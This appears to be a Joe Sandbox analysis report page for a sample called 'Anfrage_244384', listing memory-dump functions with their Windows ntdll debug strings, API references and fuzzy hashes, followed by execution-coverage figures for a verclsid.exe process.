Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGd4$minkernel\ntdll\ldrinit.c
API String ID: 0-3495290341
Opcode ID: 962b3f37a03917c992b73430c7870ab126f3678a909a35fb26b255a58a13ccf0
Instruction ID: c4e17fa18a7c5d5b98db2b5d1a64e2561122e4e3f52f4257e4e77aaee68a3ac6
Opcode Fuzzy Hash: 962b3f37a03917c992b73430c7870ab126f3678a909a35fb26b255a58a13ccf0
Instruction Fuzzy Hash: 9B3159B5600302EFE7108FADCC80EDA77BAFB95B54F550159E8057B250CBB49882CF85

Function 347220E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 3472214F
___swprintf_l.LIBCMT ref: 34722172

Strings

]:%u, xrefs: 34722169
[, xrefs: 3472212B
%%%u, xrefs: 34722146

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 5bc480b8dbed2aee9a4bbcfcfafe03df90f4b390e647e0e47b125042b25764ff
Instruction ID: 13f81428788f22a87136e305fcbfccd3c930d815647349a832bf7b0b919d3493
Opcode Fuzzy Hash: 5bc480b8dbed2aee9a4bbcfcfafe03df90f4b390e647e0e47b125042b25764ff
Instruction Fuzzy Hash: F62133BAA0011DAFDB10DEA9CC44EEE7BE9EF54654F54011AE945E7200E730DA058BA5

Function 3466F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346CE790

Strings

HEAP[%wZ]: , xrefs: 346CE701
(HeapHandle != NULL), xrefs: 346CE719
HEAP: , xrefs: 346CE70E

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 43d8b0a9c2d188c92441b919d2ed38c0eed311e42b6e2dfa3c9b1d6ab2787874
Instruction ID: 9741f0974b4a7a084970df7c6697bbda9f1c5662074ae7808c1008bc19e78ac9
Opcode Fuzzy Hash: 43d8b0a9c2d188c92441b919d2ed38c0eed311e42b6e2dfa3c9b1d6ab2787874
Instruction Fuzzy Hash: 1691FC75700741DFE719CF24C884B6EB7ADFF94A48F00056AE8469B381DB38AC45CBA6

Function 34690BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34690CDC

Strings

minkernel\ntdll\ldrinit.c, xrefs: 346DA121
LdrpCheckModule, xrefs: 346DA117
Failed to allocated memory for shimmed module list, xrefs: 346DA10F

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-161242083
Opcode ID: ab60572c20d1d5939c627dc4947d1523c5b14ca7c048b514c32850aa0fde15b0
Instruction ID: 3915e57279c022e3d73ac6760d83c61f3f738645dfaeb12be2ec8945b8de0d73
Opcode Fuzzy Hash: ab60572c20d1d5939c627dc4947d1523c5b14ca7c048b514c32850aa0fde15b0
Instruction Fuzzy Hash: FF71CDB4A00705DFEB14DF68CD80AEEB7F6EB58348F18406DD806EB250E778A946CB55

Function 346AC720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346AC7BF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 346E82E8
Failed to reallocate the system dirs string !, xrefs: 346E82D7
LdrpInitializePerUserWindowsDirectory, xrefs: 346E82DE

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: cc660ed109f15a7ec69c6bbee7c5ae131b93627a83daf8e1e289fb9a1b84dbcb
Instruction ID: 635647f890c9a65ac77b0e63355b56939c326a9441226d4d5058b803ad42ef48
Opcode Fuzzy Hash: cc660ed109f15a7ec69c6bbee7c5ae131b93627a83daf8e1e289fb9a1b84dbcb
Instruction Fuzzy Hash: 8441ECF5505300EFE720DF68CA44B9B77E9EB45650F40092AF949A32A1EB78D8018F9A

Function 346ABED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 346E7B7F
RTL: Resource at %p, xrefs: 346E7B8E
RTL: Re-Waiting, xrefs: 346E7BAC

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: bdf5bfa295abc2919467df8eff9cf5cdfed53435236fd43076617a8c63744fd5
Instruction ID: 04182786ba41a56c93c3b47942a4077acac4df8f5446692e41e21f4c3246f9e3
Opcode Fuzzy Hash: bdf5bfa295abc2919467df8eff9cf5cdfed53435236fd43076617a8c63744fd5
Instruction Fuzzy Hash: 8641F475711B029FE720CE25DD40B5AB7E5EF98B21F000A1DFA969B780DB31E8458F92

Function 346AB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 346E728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 346E7294
RTL: Resource at %p, xrefs: 346E72A3
RTL: Re-Waiting, xrefs: 346E72C1

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 08eda0f8d984d8f260d5041a93e4734b333d5168bf05d2cc98c8539f57bfa6a2
Instruction ID: 425fa7b714aa7fefdf5d827a51482418b319efd2ff6478ca9a84ff643c4ab612
Opcode Fuzzy Hash: 08eda0f8d984d8f260d5041a93e4734b333d5168bf05d2cc98c8539f57bfa6a2
Instruction Fuzzy Hash: FD412275701706AFE720CE61CD40B6AB7E5FF54B61F10061DFA85AB240DB21E8468BD2

Function 346F4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346F4809

Strings

LdrpCheckRedirection, xrefs: 346F488F
minkernel\ntdll\ldrredirect.c, xrefs: 346F4899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 346F4888

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 69255944e49f41ed5163608279885036b3f3f4b3ad71f7e2976405e944cdbded
Instruction ID: 3f94b02358e008d170a30f27f3a1574468622a23c60d654326b3e9d3e002175e
Opcode Fuzzy Hash: 69255944e49f41ed5163608279885036b3f3f4b3ad71f7e2976405e944cdbded
Instruction Fuzzy Hash: 3F41CF76A087509FDB11CE58CC40A567BE9FF69790F41056DECD8A7B21D722E800CB82

Function 34722300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 3472238D
___swprintf_l.LIBCMT ref: 347223B3

Strings

]:%u, xrefs: 347223AA
%%%u, xrefs: 34722384

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 8eb7be8442902e1ce54b34a4b26cbacd6eae62c21f2c1ddfb9dc11d58a32119c
Instruction ID: c3bba5c498b2ffab4f5f7f2a0ac6ba6d3bfba84f352c7e51433f5b1c91147c42
Opcode Fuzzy Hash: 8eb7be8442902e1ce54b34a4b26cbacd6eae62c21f2c1ddfb9dc11d58a32119c
Instruction Fuzzy Hash: EB314176A00619AFDB10CE29CC40BEF77E9EF44650F90455AE849E7241EB30EA458FA1

Function 346F5F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346F5F8F
RtlDebugPrintTimes.NTDLL ref: 346F5FB1
RtlDebugPrintTimes.NTDLL ref: 346F5FBE

Strings

Wow64 Emulation Layer, xrefs: 346F5F89

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Wow64 Emulation Layer
API String ID: 3446177414-921169906
Opcode ID: 3fee311c52b0095b4916122265b53ed504ac7ad470595ad1cb6cb6bb1f634a07
Instruction ID: f07e5b5d252bd8891d0a0339370d5ba4c2cde2289f9454638ea65795b4af55e0
Opcode Fuzzy Hash: 3fee311c52b0095b4916122265b53ed504ac7ad470595ad1cb6cb6bb1f634a07
Instruction Fuzzy Hash: 492108B690021DFFAF019EA1DC88CEF7B7DEF442A8B0400A4FA15A6101DB319E059F64

Function 3469EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a847b45efad691aa760cec01140b0e255f3330b77076c5fc7b3a02be9a701617
Instruction ID: dc3d23a8277d8d0f1d33e0b879a044a1ebda0d77c5e9d1ad8dbafe4e2473f336
Opcode Fuzzy Hash: a847b45efad691aa760cec01140b0e255f3330b77076c5fc7b3a02be9a701617
Instruction Fuzzy Hash: 5DE1FF74E00708DFEB29CFA9C980A9DBBF9FF58314F21452AE545A7260DBB0A841CF55

Function 346EEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346EEFE1
RtlDebugPrintTimes.NTDLL ref: 346EF009
RtlDebugPrintTimes.NTDLL ref: 346EF0AC
RtlDebugPrintTimes.NTDLL ref: 346EF160

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b663eedeaaf8dba84f5e0706b99934df70f8f7759ff6a1491cc94dfc51243fe9
Instruction ID: 1ad02f085e3d3389cb5503674a54a1fd36f5b0fdfbb700b1b394da4eb3d49010
Opcode Fuzzy Hash: b663eedeaaf8dba84f5e0706b99934df70f8f7759ff6a1491cc94dfc51243fe9
Instruction Fuzzy Hash: A6713971E01219EFDF09CFA4CA80AEDBBF9BF48394F144029E905AB290D7359945CF55

Function 3474A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3474A577
RtlDebugPrintTimes.NTDLL ref: 3474A62A
RtlDebugPrintTimes.NTDLL ref: 3474A64E
RtlDebugPrintTimes.NTDLL ref: 3474A663

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b6803edc0f645bd7401f95b9aa24ac75dc9f7ccffff67a0e994f8b28bd91433e
Instruction ID: a16b5b66eda169c83c528730821038a53c5e7b8ccbb07d97de48f5eccbf3e142
Opcode Fuzzy Hash: b6803edc0f645bd7401f95b9aa24ac75dc9f7ccffff67a0e994f8b28bd91433e
Instruction Fuzzy Hash: DB5158797006129FEB08CE59C6A6A29B7F6FB88350B20416DE906EB710DB74EC41CB80

Function 346EF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346EF26D
RtlDebugPrintTimes.NTDLL ref: 346EF292
RtlDebugPrintTimes.NTDLL ref: 346EF324
RtlDebugPrintTimes.NTDLL ref: 346EF378

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 1fdeb275c5dc70e85524fa09970cfb5ba095c5300e66c718c7a35003496933ad
Instruction ID: c6ea8d95eef5ccf4fa55896c14d4af02f08f6140973ecbe8399d1bc57ac6640c
Opcode Fuzzy Hash: 1fdeb275c5dc70e85524fa09970cfb5ba095c5300e66c718c7a35003496933ad
Instruction Fuzzy Hash: FC5122B5E01219EFEF08CF95D9446EDBBF9BF48391F14812AE805AB290D7349981CF54

Function 346A7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346A7B52
BaseThreadInitThunk.KERNEL32 ref: 346A7B5C
RtlDebugPrintTimes.NTDLL ref: 346E49ED
RtlDebugPrintTimes.NTDLL ref: 346E4A70

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: f5d47bb90270f0a4fe124dffd0a9df3a23f72feda1905afa653970e53bf36bcf
Instruction ID: f3e0b517419df9733edcfaaeb8dbd037e78097ea1bf945cddb9cd89788d5d73f
Opcode Fuzzy Hash: f5d47bb90270f0a4fe124dffd0a9df3a23f72feda1905afa653970e53bf36bcf
Instruction Fuzzy Hash: 543102B5E01218DFDF15DFA8D884AADBBF2FB48720F10412AE511B7290CB355941DF58

Function 346759C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 346D0AA7

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8a6829ef4146e8957b5877c71cdb110409aa3ed393a7807d1be488e32f7f187a
Instruction ID: 42eb5e6584bf906a50bb38e1f29564585e978d764716170045de328c689166b5
Opcode Fuzzy Hash: 8a6829ef4146e8957b5877c71cdb110409aa3ed393a7807d1be488e32f7f187a
Instruction Fuzzy Hash: 2F327470E04369CFEB61CF64C894BD9BBB4BF09314F0081EAD449A7651EBB49A84CF91

Function 346B7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 346B7E8B

Strings

-, xrefs: 346B7DDD
+, xrefs: 346B7DE8

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: deae2deda72ce2af1e82151fe7e7fe0f15711a6e944e2cb2bf8a4b259bcaee1b
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 31919674E002199FEF10CE67C8816AEB7A9EF547A2F50451AE8D5EB3C0D7309941C766

Function 346A4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

Flst, xrefs: 346A4C96
0, xrefs: 346A4CC3

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: b027099da8eff567533546ce784e40d0db711c6fa22edd0029efaf0651015567
Instruction ID: f140de21e09637358b5b8c9b32cd42d181b357af3851a09bbd80f721536ff4be
Opcode Fuzzy Hash: b027099da8eff567533546ce784e40d0db711c6fa22edd0029efaf0651015567
Instruction Fuzzy Hash: F051AAF5E00A08DFEB14DF99C984699FBF4EF94394F14802ED04AAB250EB709D85CB81

Function 346704E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3467055E

Strings

kLsE, xrefs: 34670540
TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3467063D

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 63697effb42263f46d0236f8eca167aa320a566b9f7d5307ef355a4d090e8d96
Instruction ID: 49526f8d91a7deca08cfb6b7310ab180bba7f26170b64be269de71dded9e64a6
Opcode Fuzzy Hash: 63697effb42263f46d0236f8eca167aa320a566b9f7d5307ef355a4d090e8d96
Instruction Fuzzy Hash: 1F51DFB5600B42CFE324DF24C590693BBE8AF85314F10883EE99997240E770E945CFA6

Function 346FCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 346FCFBD

Strings

@4Cw@4Cw, xrefs: 346FCFD5, 346FCFDA, 346FCFF1
@, xrefs: 346FCF0A

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: 77444003db77e7fb06c1645830c0aa90935b24d5fb5a37f4e2dae310898f9955
Instruction ID: 8856c255b3b4f1c9ed88958c802da0a20c8a17678d49c91355fb9e14dffc3136
Opcode Fuzzy Hash: 77444003db77e7fb06c1645830c0aa90935b24d5fb5a37f4e2dae310898f9955
Instruction Fuzzy Hash: C6419DB1900214DFEB218FA9DC40AAEFBB9FF55714F00402AED46EB261D735D845CBA9

Function 3466DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3466E040

Strings

0, xrefs: 3466E020
0, xrefs: 3466E00B

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 932bade430e902991edbee024d625b767d2101ce0f31ad65df61f35f401a6615
Instruction ID: e20ba917114301940447eb0d46e0c7e697f9db229f8156be04d62216073e579e
Opcode Fuzzy Hash: 932bade430e902991edbee024d625b767d2101ce0f31ad65df61f35f401a6615
Instruction Fuzzy Hash: 36416AB5608746EFD300CF28C484A0ABBE5FB89318F044A2EF589DB341D775EA05CB96

Analysis Process: verclsid.exePID: 1056, Parent PID: 3052COMMON

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	3.5%
Signature Coverage:	0.7%
Total number of Nodes:	459
Total number of Limit Nodes:	77

Executed Functions

Function 003B9DF0 Relevance: 26.5, Strings: 21, Instructions: 281
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R=, xrefs: 003B9F07
W#, xrefs: 003B9EDF
Um, xrefs: 003BA00F
|, xrefs: 003B9F6F
?, xrefs: 003B9E71
yB, xrefs: 003B9F84
z", xrefs: 003BA16E
G, xrefs: 003B9FAA
:, xrefs: 003B9EAD
f, xrefs: 003B9E15
\, xrefs: 003B9EA3
5, xrefs: 003B9E3A
NK, xrefs: 003B9EF3
u, xrefs: 003B9E0E
(e, xrefs: 003B9F22
>t, xrefs: 003B9FD3
'O, xrefs: 003B9FF1
#I, xrefs: 003BA205
9, xrefs: 003B9E85
2Z, xrefs: 003BA005
o}, xrefs: 003B9E2A

Memory Dump Source

